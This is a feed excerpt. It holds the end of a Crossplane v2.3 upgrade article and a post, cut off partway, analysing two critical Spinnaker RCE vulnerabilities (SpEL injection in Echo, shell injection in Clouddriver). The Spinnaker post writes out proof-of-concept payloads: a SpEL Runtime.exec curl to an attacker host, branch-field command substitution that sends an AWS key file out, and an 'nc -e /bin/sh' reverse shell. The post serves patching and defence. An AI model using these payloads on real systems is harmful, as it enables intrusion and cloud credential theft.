&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Standardize force-refresh procedure on &lt;code&gt;reconcile-requested-at&lt;/code&gt; — runbook update&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;Runbook merged, ≥1 incident application&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Upgrade prod to v2.3.0 (alpha gates OFF)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane version --server&lt;/code&gt; = v2.3.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Prod: &lt;code&gt;--enable-no-op-status-update-skip&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;1-week soak, ETCD PUT + apiserver CPU report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Prod: &lt;code&gt;--enable-provider-deletion-protection&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;ClusterUsage created; tear-down doc updated to "delete ClusterUsage → delete Provider"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;CI gate added — High-Fidelity Render diff on PRs&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Workflow merged, ≥1 regression PR blocked in practice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Internal asdf/Mise picks Crossplane CLI from new repo&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;asdf install crossplane 2.3.0&lt;/code&gt; works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;crossplane beta trace -o yaml&lt;/code&gt; snapshotted daily to Git&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Nightly Cron + PR automation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;Prometheus alerts: XR circuit breaker open, MR poll-interval=24h+ ratio&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Alert PR merged, fire/resolve test passed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;RFC: alpha gate enablement policy (dev immediate, staging 1w, prod +1w)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;RFC merged, in quarterly security/release review&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  10. Conclusion — The Inflection Point of "Operationally Trustworthy Control Plane"
&lt;/h2&gt;

&lt;p&gt;The six v2.3 changes share one sentence: &lt;strong&gt;"the v2 series, for the first time, demonstrates its reliability claim with operational metrics."&lt;/strong&gt; The High-Fidelity Render Engine structurally resolves the six-year "local diverges from cluster" pain. Provider Deletion Protection blocks the top-incident scenario with one alpha gate. The two reconcile annotations finally hand operators the per-resource cadence control they've been asking for. The XR circuit-breaker reset simplifies post-incident recovery. The no-op status update skip removes ETCD write pressure. The CLI repo split opens a faster lane for CLI-side evolution.&lt;/p&gt;

&lt;p&gt;Three things to keep in mind going into adoption:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Stage the alpha gates.&lt;/strong&gt; dev OFF for regression, staging ON for 1 week, prod for another 1 week before flipping.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Re-audit fully qualified package URLs immediately before upgrading.&lt;/strong&gt; v2 rejects short names. Leftover short-name packages will fail controller boot even on a v2.2 → v2.3 minor upgrade.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The High-Fidelity Render payoff shows up in CI, not at the CLI.&lt;/strong&gt; A single &lt;code&gt;crossplane render&lt;/code&gt; call won't &lt;em&gt;feel&lt;/em&gt; different. Wire render-diff into PR gates and you'll catch composition regressions before merge.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Shortest single-line recommendation: &lt;strong&gt;"Upgrade dev to v2.3 today, enable both alpha gates in staging this week."&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Cross-posted from &lt;a href="https://www.manoit.co.kr/forum/view/1478693" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;. Authored by the ManoIT Platform Team with AI-assisted drafting (Claude Opus 4.6) on May 27, 2026. All operational figures cited are from internal staging measurements and are reproducible on any cluster of comparable size.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1478693" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>cloud</category>
      <category>devops</category>
      <category>cncf</category>
    </item>
    <item>
      <title>Spinnaker 2026.1.0 Emergency Patch — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Tue, 26 May 2026 00:14:56 +0000</pubDate>
      <link>https://dev.to/x4nent/spinnaker-202610-emergency-patch-cve-2026-32613-echo-spel-rce-cve-2026-32604-clouddriver-el7</link>
      <guid>https://dev.to/x4nent/spinnaker-202610-emergency-patch-cve-2026-32613-echo-spel-rce-cve-2026-32604-clouddriver-el7</guid>
      <description>&lt;h1&gt;
  
  
  Spinnaker 2026.1.0 Emergency Patch Deep Dive — CVE-2026-32613 Echo SpEL RCE + CVE-2026-32604 Clouddriver Gitrepo Shell Injection (Double CVSS 9.9 Critical) Redefining the 2026 GitOps Multi-Cloud Delivery Pipeline Security Standard
&lt;/h1&gt;

&lt;p&gt;On April 20, 2026, the Spinnaker security team simultaneously disclosed two CVSS 9.9 Critical remote code execution vulnerabilities. The first is &lt;strong&gt;CVE-2026-32613&lt;/strong&gt; — the Echo service's &lt;em&gt;expected artifacts&lt;/em&gt; evaluation logic fails to restrict the Spring Expression Language (SpEL) context to a trusted class allowlist, allowing an authenticated user to instantiate arbitrary Java classes and execute host commands. The second is &lt;strong&gt;CVE-2026-32604&lt;/strong&gt; — Clouddriver's &lt;code&gt;GitJobArtifactDownloader&lt;/code&gt; interpolates the &lt;code&gt;reference&lt;/code&gt;, &lt;code&gt;version&lt;/code&gt;, and &lt;code&gt;artifactAccount&lt;/code&gt; fields of a gitrepo artifact directly into a &lt;code&gt;sh -c&lt;/code&gt; invocation without validation, so shell metacharacters such as backticks, &lt;code&gt;$(...)&lt;/code&gt;, &lt;code&gt;;&lt;/code&gt;, and &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; are passed straight to the shell, escalating to RCE.&lt;/p&gt;

&lt;p&gt;Both vulnerabilities are &lt;strong&gt;post-authentication&lt;/strong&gt;, but many Spinnaker deployments sit behind a single SSO entry point with permissive RBAC, so the real attack surface is much larger than "auth required" suggests. Patches landed simultaneously across &lt;strong&gt;2026.1.0, 2026.0.1, 2025.4.2, and 2025.3.2&lt;/strong&gt;, and on the same day ZeroPath published a PoC for both CVEs — &lt;em&gt;the patch window became the exposure window&lt;/em&gt;. This article decomposes the root cause of each CVE at the SpEL context handling and ProcessBuilder invocation level, reconstructs the public PoC at the PR / CLI / Helm values level, and consolidates ManoIT's phased patch, temporary block, and observability strategy applied to four internal multi-cloud delivery pipelines across nine axes.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why April 20, 2026 Is the Inflection Point for Spinnaker Security
&lt;/h2&gt;

&lt;p&gt;Spinnaker is a multi-cloud continuous delivery platform open-sourced by Netflix in 2014 and transferred to the CNCF in 2019. Its strength is a distributed architecture split into four-plus microservices (Deck UI, Gate API gateway, Orca orchestrator, Clouddriver cloud abstraction, Echo event router, Igor CI integration, Fiat authorization, Front50 metadata, Kayenta canary, Rosco bakery), but that same split creates &lt;strong&gt;ambiguous trust boundaries between services&lt;/strong&gt;. The two CVEs disclosed on April 20 are exactly the result of that ambiguity.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Operational Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2014.07&lt;/td&gt;
&lt;td&gt;Netflix open-sources Spinnaker&lt;/td&gt;
&lt;td&gt;Start of multi-cloud CD standard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2019.04&lt;/td&gt;
&lt;td&gt;CNCF Incubating Project accepted&lt;/td&gt;
&lt;td&gt;Community governance settles&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024.11&lt;/td&gt;
&lt;td&gt;Spinnaker 2025.0.0 released&lt;/td&gt;
&lt;td&gt;Halyard dependency partially removed, Kubernetes 1.30 support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.07&lt;/td&gt;
&lt;td&gt;Spinnaker 2025.3.0&lt;/td&gt;
&lt;td&gt;Echo SpEL evaluation path expanded (artifact trigger regex)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.11&lt;/td&gt;
&lt;td&gt;Spinnaker 2025.4.0&lt;/td&gt;
&lt;td&gt;Clouddriver gitrepo artifact HTTPS basic auth added&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.02&lt;/td&gt;
&lt;td&gt;Spinnaker 2026.0.0&lt;/td&gt;
&lt;td&gt;Operator recommended over Halyard, Kubernetes 1.32 support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.07&lt;/td&gt;
&lt;td&gt;Spinnaker 2026.0.2 (no security patch)&lt;/td&gt;
&lt;td&gt;Minor bugfix release&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.20&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CVE-2026-32613 + CVE-2026-32604 simultaneous disclosure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Two CVSS 9.9 Critical, same-day patches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.20&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Patches 2026.1.0 / 2026.0.1 / 2025.4.2 / 2025.3.2 released&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Four supported lines patched simultaneously, workarounds documented&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.04.21&lt;/td&gt;
&lt;td&gt;ZeroPath PoC published (GitHub)&lt;/td&gt;
&lt;td&gt;Patch and exposure windows effectively identical&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.02&lt;/td&gt;
&lt;td&gt;CCB Belgium national cybersecurity advisory&lt;/td&gt;
&lt;td&gt;"Patch Immediately" — government/finance distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.15&lt;/td&gt;
&lt;td&gt;Armory, OpsMx etc. commercial distros backport patches&lt;/td&gt;
&lt;td&gt;Enterprise customer notification emails&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two lines matter most operationally: (1) &lt;em&gt;the patch and the PoC dropped in the same week&lt;/em&gt; — teams assuming a one-month patch grace period had 24 hours to decide; (2) &lt;em&gt;four support lines were patched simultaneously&lt;/em&gt; — Spinnaker informally supports &lt;code&gt;2025.3.x&lt;/code&gt;, &lt;code&gt;2025.4.x&lt;/code&gt;, &lt;code&gt;2026.0.x&lt;/code&gt;, and &lt;code&gt;2026.1.x&lt;/code&gt; as LTS lines, and the vulnerable code lived in all four, so &lt;em&gt;version downgrade is not a viable mitigation&lt;/em&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. CVE-2026-32613 — Echo Service SpEL Context-Unrestricted RCE
&lt;/h2&gt;

&lt;p&gt;The first CVE lives in Echo's &lt;code&gt;echo-pipelinetriggers&lt;/code&gt; module. Echo is Spinnaker's event router — it receives external events (CI build completion, Pub/Sub, scheduled times, artifact changes) and fires the registered pipelines. During this flow it evaluates &lt;em&gt;expected artifacts&lt;/em&gt; (the artifacts a pipeline waits for) using Spring Expression Language.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Root Cause — Inconsistent SpEL Context Handling Between Orca and Echo
&lt;/h3&gt;

&lt;p&gt;Spinnaker's Orca (the pipeline orchestrator) restricts the SpEL evaluation context to a &lt;strong&gt;trusted class allowlist&lt;/strong&gt;. This is the standard pattern adopted after a series of SpEL injection issues reported in 2019. However, Echo's &lt;code&gt;expected artifacts&lt;/code&gt; evaluation path missed applying this allowlist, leaving &lt;strong&gt;SpEL with full JVM class access&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;Orca (safe)&lt;/th&gt;
&lt;th&gt;Echo (vulnerable, pre-patch)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SpEL ParserContext&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;StandardEvaluationContext&lt;/code&gt; + &lt;strong&gt;trusted class allowlist&lt;/strong&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;StandardEvaluationContext&lt;/code&gt; (unrestricted)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Accessible classes&lt;/td&gt;
&lt;td&gt;Spinnaker context vars + allowlisted classes&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Entire JVM (incl. java.lang.Runtime)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;T(...)&lt;/code&gt; operator&lt;/td&gt;
&lt;td&gt;Allowlist only&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Arbitrary classes allowed&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reflection calls&lt;/td&gt;
&lt;td&gt;Blocked&lt;/td&gt;
&lt;td&gt;Available&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Arbitrary method invocation&lt;/td&gt;
&lt;td&gt;Allowlisted methods only&lt;/td&gt;
&lt;td&gt;All public methods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Post-2019 SpEL CVE response&lt;/td&gt;
&lt;td&gt;Applied&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Missed (5 years undetected)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most painful line is the last one. The protection Orca had applied five years ago was &lt;em&gt;missing&lt;/em&gt; from Echo's expected-artifacts evaluation path for nearly five years. The patch fills exactly that gap — Echo's SpEL context now uses the same trusted class allowlist as Orca. &lt;strong&gt;The patch itself is around 30 lines of change&lt;/strong&gt;, but for the five years those 30 lines were missing, every Spinnaker instance was exposed.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 Attack Scenario — Poisoning an Expected Artifact Field with a SpEL Payload
&lt;/h3&gt;

&lt;p&gt;Assume the attacker compromised an account with &lt;code&gt;roles=APPLICATION_OWNER&lt;/code&gt; (the most common Spinnaker user role). The attack flow:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Log in to Spinnaker Gate API, capture session cookie&lt;/span&gt;
&lt;span class="nv"&gt;GATE&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://gate.spinnaker.example.com"&lt;/span&gt;
curl &lt;span class="nt"&gt;-sS&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt; cookies.txt &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GATE&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/login/google"&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s2"&gt;"username=victim&amp;amp;password=..."&lt;/span&gt;

&lt;span class="c"&gt;# 2) Create a new pipeline (or edit an existing one)&lt;/span&gt;
&lt;span class="c"&gt;# Inject SpEL payload into the expected artifact's name field&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; pipeline.json &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;JSON&lt;/span&gt;&lt;span class="sh"&gt;'
{
  "application": "marketing",
  "name": "exfil-demo",
  "expectedArtifacts": [{
    "id": "art-0",
    "matchArtifact": {
      "type": "docker/image",
      "name": "&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;T&lt;/span&gt;&lt;span class="p"&gt;(java.lang.Runtime).getRuntime().exec(new String[]{&lt;/span&gt;&lt;span class="s1"&gt;'sh'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'-c'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'curl https://attacker.example/$(hostname)/$(id)'&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;).getInputStream()}",
      "reference": "x"
    },
    "useDefaultArtifact": true,
    "defaultArtifact": {"type": "docker/image", "name": "x", "reference": "x"}
  }],
  "triggers": [{"type": "pubsub", "enabled": true, "pubsubSystem": "google", "subscriptionName": "spinnaker"}],
  "stages": []
}
&lt;/span&gt;&lt;span class="no"&gt;JSON

&lt;/span&gt;&lt;span class="c"&gt;# 3) Save pipeline -&amp;gt; next Pub/Sub event triggers Echo to evaluate the SpEL -&amp;gt; RCE&lt;/span&gt;
curl &lt;span class="nt"&gt;-sS&lt;/span&gt; &lt;span class="nt"&gt;-b&lt;/span&gt; cookies.txt &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-X&lt;/span&gt; POST &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GATE&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;/pipelines"&lt;/span&gt; &lt;span class="nt"&gt;--data-binary&lt;/span&gt; @pipeline.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key is that &lt;code&gt;${T(java.lang.Runtime).getRuntime().exec(...)}&lt;/code&gt; executes &lt;strong&gt;as-is&lt;/strong&gt; during Echo's SpEL evaluation. &lt;code&gt;T(...)&lt;/code&gt; is the SpEL type-reference operator; with an allowlist in place, &lt;code&gt;java.lang.Runtime&lt;/code&gt; is rejected. Pre-patch Echo had no such rejection logic, so the payload runs &lt;code&gt;sh -c&lt;/code&gt; inside the Echo container and exfiltrates output to an external endpoint.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.3 SpEL Evaluation Code Before and After the Patch
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Before patch&lt;/th&gt;
&lt;th&gt;After patch (2026.1.0 / 2025.3.2 backport)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Evaluation context creation&lt;/td&gt;
&lt;td&gt;&lt;code&gt;new StandardEvaluationContext()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SpinnakerSpelEvaluationContext.trusted()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Type locator&lt;/td&gt;
&lt;td&gt;Default &lt;code&gt;StandardTypeLocator&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Allowlist-based &lt;code&gt;TrustedTypeLocator&lt;/code&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Allowlisted classes (examples)&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;String&lt;/code&gt;, &lt;code&gt;Math&lt;/code&gt;, &lt;code&gt;Integer&lt;/code&gt;, &lt;code&gt;Long&lt;/code&gt;, &lt;code&gt;Double&lt;/code&gt;, &lt;code&gt;Boolean&lt;/code&gt;, &lt;code&gt;List&lt;/code&gt;, &lt;code&gt;Map&lt;/code&gt;, partial Spinnaker domain models&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Blocked classes (examples)&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;java.lang.Runtime&lt;/code&gt;, &lt;code&gt;java.lang.ProcessBuilder&lt;/code&gt;, &lt;code&gt;java.lang.reflect.*&lt;/code&gt;, &lt;code&gt;java.io.File&lt;/code&gt;, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Non-allowlisted class call&lt;/td&gt;
&lt;td&gt;Executes&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SpelEvaluationException: type 'X' is not whitelisted&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Logging&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;Blocked evaluations logged at WARN level (detectable)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Operationally interesting: the patch &lt;strong&gt;logs blocked SpEL evaluations at WARN level&lt;/strong&gt;. This means &lt;strong&gt;legitimate pipelines may break right after patching&lt;/strong&gt; because of the allowlist — a topic for the next section.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. CVE-2026-32604 — Clouddriver Gitrepo Artifact Shell Metacharacter Injection RCE
&lt;/h2&gt;

&lt;p&gt;The second CVE lives in Clouddriver's &lt;code&gt;clouddriver-artifacts-gitrepo&lt;/code&gt; module — specifically the &lt;code&gt;GitJobArtifactDownloader&lt;/code&gt; class. This class is invoked when a gitrepo-typed artifact is referenced in a pipeline; it &lt;em&gt;clones the specified Git repository to local disk&lt;/em&gt; and downloads files at a specific branch / tag / path for downstream stages.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Root Cause — Shell Command String Interpolation Passed to ProcessBuilder
&lt;/h3&gt;

&lt;p&gt;The downloader needs to execute something like &lt;code&gt;git clone --depth 1 --branch &amp;lt;branch&amp;gt; &amp;lt;url&amp;gt; &amp;lt;tmpdir&amp;gt;&lt;/code&gt;. Pre-patch, the code assembled this as &lt;code&gt;List&amp;lt;String&amp;gt; args = ["sh", "-c", "git clone ... " + branch + " ..."]&lt;/code&gt; and called &lt;code&gt;new ProcessBuilder(args).start()&lt;/code&gt;. In other words, &lt;strong&gt;the user-supplied branch string entered shell word-splitting inside &lt;code&gt;sh -c&lt;/code&gt;&lt;/strong&gt;. Shell metacharacters are interpreted by the shell, and backticks / &lt;code&gt;$(...)&lt;/code&gt; are executed as command substitution.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Artifact field&lt;/th&gt;
&lt;th&gt;Example legitimate value&lt;/th&gt;
&lt;th&gt;Example malicious value&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;reference&lt;/code&gt; (URL)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://github.com/org/repo.git&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;`&lt;a href="https://github.com/org/repo.git" rel="noopener noreferrer"&gt;https://github.com/org/repo.git&lt;/a&gt;; curl evil.sh\&lt;/td&gt;
&lt;td&gt;sh; #`&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;version&lt;/code&gt; (branch)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;main&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;main$(curl https://attacker/&lt;/code&gt;whoami&lt;code&gt;)&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;RCE + hostname/user exfiltration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;location&lt;/code&gt; (path)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;k8s/deploy.yaml&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;k8s/deploy.yaml; nc evil 4444 -e /bin/sh&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Reverse shell&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;artifactAccount&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;github-prod&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;github-prod`id`&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;RCE + privilege info leak&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most-cited PoC one-liner:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git/repo"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"reference"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/example/x.git"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"version"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"main$(curl https://attacker.example/exfil?h=$(hostname)&amp;amp;u=$(id -un)&amp;amp;k=$(cat /etc/spinnaker/secrets/aws-key))"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"location"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"k8s/"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"artifactAccount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"github-prod"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When Clouddriver processes this gitrepo artifact, it evaluates to &lt;code&gt;sh -c "git clone --branch main$(curl ...) ..."&lt;/code&gt;. The &lt;code&gt;$(curl ...)&lt;/code&gt; executes first, exfiltrating &lt;code&gt;/etc/spinnaker/secrets/aws-key&lt;/code&gt; to the attacker. Clouddriver is the most sensitive service because it holds cloud API credentials, so &lt;strong&gt;AWS IAM keys, GCP service account keys, and Azure client secrets are all exposed&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 ProcessBuilder Invocation Before and After the Patch
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Before patch&lt;/th&gt;
&lt;th&gt;After patch (2026.1.0)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Command assembly&lt;/td&gt;
